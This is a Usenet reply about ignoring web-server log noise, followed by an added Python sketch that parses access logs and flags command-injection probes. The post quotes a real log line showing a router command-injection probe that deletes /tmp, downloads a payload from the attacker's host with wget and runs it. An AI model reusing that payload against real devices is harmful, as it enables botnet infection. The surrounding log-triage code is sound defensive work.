From: Andreas Kohlbach
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sun, 18 Dec 2022 18:47:25 -0500
Organization: A noiseless patient Spider
Message-ID: <87sfhcs29e.fsf@usenet.ankman.de>
References: <87r0x0xmre.fsf@usenet.ankman.de> <87mt7mwyvl.fsf@usenet.ankman.de> <871qoywh67.fsf@usenet.ankman.de> <875ye9v7ho.fsf@usenet.ankman.de>

On Sun, 18 Dec 2022 23:35:23 +0100, Carlos E. R. wrote:
>
> On 18/12/2022 02.13, Andreas Kohlbach wrote:
>>
>> I was referring to "can fill the filesystem".
>
> Yes, rotating logs takes care of that. But the issue of too much noise
> remains.

The typical Linux user of today can ignore the noise. Ignore your logs, unless you feel something is not right.

Same with (my) web server. Again, I do not offer a commercial service. Thus I do not often look into the logs and let logrotate take care of compressing and later getting rid of logs. Every so often I check for "200 " to see who had success, and chuckle about things like

190.180.154.158 - - [18/Dec/2022:12:02:10 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://190.180.154.158:38147/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 341 "-" "-"

in the log.

Yes, I could block 190.180.154.158 or a netblock around it. But why? It's just noise I choose to ignore.
-- 
Andreas
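
An added example, not part of the original post: a plain text search for "200 " also matches lines where 200 is the response size, so this sketch reads the status field itself and separates successful requests from successful requests that look like command-injection probes. It assumes the Apache/nginx "combined" log format; the marker list is an assumed heuristic and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Combined format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Assumed heuristic markers of command-injection probes (not exhaustive).
PROBE_MARKERS = ("cmd=", "wget ", "curl ", "/bin/sh", "rm -rf")

# Constructed sample lines using documentation-range addresses.
SAMPLE = [
    '192.0.2.10 - - [18/Dec/2022:12:02:10 -0500] '
    '"GET /setup.cgi?todo=syscmd&cmd=rm+-rf+/tmp/* HTTP/1.0" 404 341 "-" "-"',
    '192.0.2.11 - - [18/Dec/2022:12:05:00 -0500] '
    '"GET /missing.html HTTP/1.1" 404 200 "-" "-"',
    '198.51.100.7 - - [18/Dec/2022:12:06:30 -0500] '
    '"GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [18/Dec/2022:12:07:45 -0500] '
    '"GET /cgi-bin/test.cgi?cmd=id HTTP/1.1" 200 87 "-" "-"',
]

def parse(line):
    """Return the log fields as a dict, or None if the line is malformed."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry

def is_probe(request):
    """True if the URL-decoded request line contains a probe marker."""
    decoded = unquote_plus(request).lower()
    return any(marker in decoded for marker in PROBE_MARKERS)

def triage(lines):
    """Return (successes, successful_probes), judged on the status field only."""
    successes, hits = [], []
    for line in lines:
        entry = parse(line)
        if entry is None or not 200 <= entry["status"] < 300:
            continue
        successes.append(entry)
        if is_probe(entry["request"]):
            hits.append(entry)
    return successes, hits

def naive_grep(lines):
    """Equivalent of searching for the literal text '200 '."""
    return [line for line in lines if "200 " in line]
```

On the sample, the literal search returns three lines (one is a 404 whose size is 200), while `triage` returns two real successes and flags one of them as a probe that was answered with 200.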